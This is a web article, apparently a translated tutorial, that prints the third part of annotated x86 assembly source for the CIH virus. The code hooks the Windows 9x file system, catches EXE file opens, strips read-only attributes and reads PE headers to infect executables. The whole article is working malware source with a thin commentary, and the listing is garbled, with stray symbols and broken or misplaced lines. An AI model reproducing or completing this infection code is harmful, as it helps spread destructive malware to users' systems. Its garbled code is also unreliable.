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Analysis of virus program source code examples-CIH virus[3]

2017-01-17 11:16:422047browse

jmp ExitRing0Init;Exit Ring0 level
 ;Merged code size
 CodeSizeOfMergeVirusCodeSection = offset $
 call @4
 pop ebx ;Get the offset address of the current instruction
 add ebx, FileSystemApiHook-@4 ;The difference plus the offset is equal to FileSystemApiHook Offset
Push ebx
int 20h; Call Vxd to remove the hook pointing to FileSystemApiHook
IFSMgr_RemoveFileSystemApiHook = $
dd 00400068h; Use eax, ecx, edx and flags registers
pop eax
push ebx

call OldInstallFileSystemApiHook-@3[ebx]
pop ecx

mov dr0, eax ;Adjust OldFileSystemApiHook address

pop eax
pop ebx
 # Push ad ;Save the register
@5 ;esi is the offset of FileSystemApiHook
;;The difference between the offset of VirusGameDataStartAddress and VirusGameDataStartAddress is equal to the offset of VirusGameDataStartAddress
;Test the "busy" flag, and "busy" goes to pIFSFunc
 test byte ptr (OnBusy-@6)[esi], 01h
jnz pIFSFunc

; If the file is not open, go to prevhook
lea ebx, [esp+20h+04h+04h] ;ebx is the address of FunctionNum
 ;The calling format of the file system hook is as follows
 ;FileSystemApiHookFunction(pIFSFunc FSDFnAddr, int FunctionNum, int Drive,
 ;int ResourceFlags, int CodePage, pioreq pir)
 ;Determine whether this call is to open a file, if not, jump to the previous file hook
 cmp dword ptr [ebx], 00000024h
 jne prevhook
 inc byte ptr (OnBusy -@6)[esi] ; Enable OnBusy ;Set the "Busy" flag to "Busy"
 ;Get the drive letter specified by the file path, and then put the drive name into the FileNameBuffer
 ;If the drive letter If it is 03h, it means that the drive is C drive
mov esi, offset FileNameBuffer
add esi, FileNameBuffer-@6 ;esi points to FileNameBuffer

push esi ;save
mov al, [ebx +04h] ;ebx+4 is the address of the disk number
 ;Is it a UNC (universal naming conventions) address? If so, transfer to CallUniToBCSPath
 cmp al, 0ffh
 je CallUniToBCSPath
Add al, 40h
mov ah, ':'
mov [esi], eax ; processed into the form of "X:", that is, add a colon after the drive letter
inc esi
 inc esi
 ;Convert Canonicalized Unicode characters to ordinary BCS character set, call method
 ;UniToBCSPath(unsigned char * pBCSPath, ParsedPath * pUniPath,
 ;unsigned int maxLength, int charSet)
push 00000000h ;Character set
push FileNameBufferSize ;Character length
mov ebx, [ebx+10h]
mov eax, [ebx+0ch]
Add eax, 04h
push eax ; Uni character first address
push esi ; BCS character first address
int 20h ; Call UniToBCSPath
UniToBCSPath = $
dd 00400041h Call id
add esp, 04h*04h
 ;Determine whether the file is an EXE file
 cmp [esi+eax-04h], 'EXE.'
 pop esi
 jne DisableOnBusy
 ;The following information is for debugging
 cmp [esi+eax-06h], 'KCUF'
 jne DisableOnBusy
 ;Judgment file Whether it exists, if not, go to DisableOnBusy
 cmp word ptr [ebx+18h], 01h
 jne DisableOnBusy
 ;Get the file attributes
 mov ax, 4300h
 int 20h ;The function of calling IFSMgr_Ring0_FileIO to obtain file attributes
IFSMgr_Ring0_FileIO = $
dd 00400032h ;Call number

jc DisableOnBusy
Push ecx
;Get IFSMgr_Ring0_FileIO address
mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
mov edi, [edi]
 ; Determine whether the file is read-only, if so, modify the file attributes, otherwise go to OpenFile
Test cl, 01h
jz OpenFile

mov ax, 4301h
xor ecx, ecx
call edi ;Call IFSMgr_Ring0_FileIO to modify the file attributes to make the file writable
 ;Open the file
 xor eax, eax
 mov ah, 0d5h
 xor ecx, ecx ;File attributes
xor edx, edx
inc edx
mov ebx, edx
inc ebx ;esi is the first address of the file name
call edi ;Call the function of IFSMgr_Ring0_FileIO to open the file
## test cl, 01h
  jz IsOpenFileOK
 ;Restore file attributes
mov ax, 4301h
call edi;Restore file attributes
 ;Whether the file is opened successfully, if not , then turn to DisableOnBusy
jc DisableOnBusy

; The file is opened successfully
push esi; Push the first address of the file name data area onto the stack
pushf ;CF = 0, save flag
 add esi, DataBuffer-@7 ;esi points to the first address of the data area
 ;Get the offset of the new file header
 xor eax, eax
 mov ah, 0d6h;IFSMgr_Ring0_FileIO's file reading function number (R0_READFILE)
 ;In order to minimize the length of the virus code, save eax to ebp
 mov ebp, eax
Push 00000004h ; Read 4 bytes
pop ecx
push 0000003ch ; Read the Windows file header offset at DOS file header offset 3ch
pop edx
call edi ; Read File to esi
 mov edx, [esi] ;Windows file header offset to edx
 ; Get the PE mark and infected mark of the graphic file header
 dec edx
 mov eax, ebp ; function number
 call edi ; read file to esi

; Determine whether it is PE, if so, further determine whether it has been infected , if so, it will not be infected with Self-Extractor *
 cmp dword ptr [esi], 00455000h; Determine whether it is a PE file (mark "PE/0/0")
 jne CloseFile; If not, close the file
​ ;Mark size
push edx ;edx points to PE file header offset 00h
push edi ;edi is the address of IFSMgr_Ring0_FileIO
 mov dr1, esp ;Save esp
push eax
  Read file header
 mov eax, ebp  
 mov cl, SizeOfImageHeaderToRead      To read 2 bytes  
 add edx, 07h                                                For NumberOfSections (number of blocks)
 call edi ;Read NumberOfSections (number of blocks) to esi
 lea eax, (AddressOfEntryPoint-@8)[edx]
  push eax ;File pointer
 lea eax, (NewAddressOfEntryPoint-@8)[esi]
 push eax; Buffer address
 ;Put the value of edx to the beginning of the file virus code block table
 movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi]
 lea edx, [eax+edx+12h] ;edx is the offset of the virus code block table
 ;Get the virus code block table The size of
mov al, SizeOfScetionTable ;The size of each block table entry
The number of blocks is equal to the size of the block table
 ; Set the virus code block table
 lea esi, (StartOfSectionTable-@8)[esi]; esi points to the first address of the block table (in the virus dynamic data area)

The above is the content of virus program source code example analysis-CIH virus [3]. For more related content, please pay attention to the PHP Chinese website (www.php.cn)!

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